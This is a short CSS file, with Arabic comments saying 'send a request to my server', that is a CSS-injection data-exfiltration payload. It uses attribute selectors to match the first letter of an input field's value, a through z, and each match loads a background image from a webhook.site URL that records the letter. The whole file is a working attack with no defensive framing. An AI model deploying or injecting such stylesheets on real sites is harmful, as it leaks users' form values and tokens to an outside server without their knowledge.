/* إذا بدأ حقل الإدخال بحرف 'a' أرسل طلباً لسيرفري */
input[value^="a"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=a");
}
/* نكرر لكل الحروف والأرقام */
input[value^="b"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=b");
}
input[value^="c"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=c");
}
input[value^="d"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=d");
}
input[value^="e"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=e");
}
input[value^="f"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=f");
}
input[value^="g"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=g");
}
input[value^="h"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=h");
}
input[value^="i"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=i");
}
input[value^="j"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=j");
}

input[value^="k"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=k");
}

input[value^="l"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=l");
}

input[value^="m"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=m");
}

input[value^="n"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=n");
}

input[value^="o"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=o");
}

input[value^="p"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=p");
}

input[value^="q"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=q");
}

input[value^="r"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=r");
}

input[value^="s"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=s");
}

input[value^="t"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=t");
}

input[value^="u"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=u");
}

input[value^="v"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=v");
}

input[value^="w"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=w");
}

input[value^="x"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=x");
}

input[value^="y"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=y");
}

input[value^="z"] {
  background-image: url("https://webhook.site/b36a8acc-2ebd-45fc-a54c-681eea0f7dca=z");
}


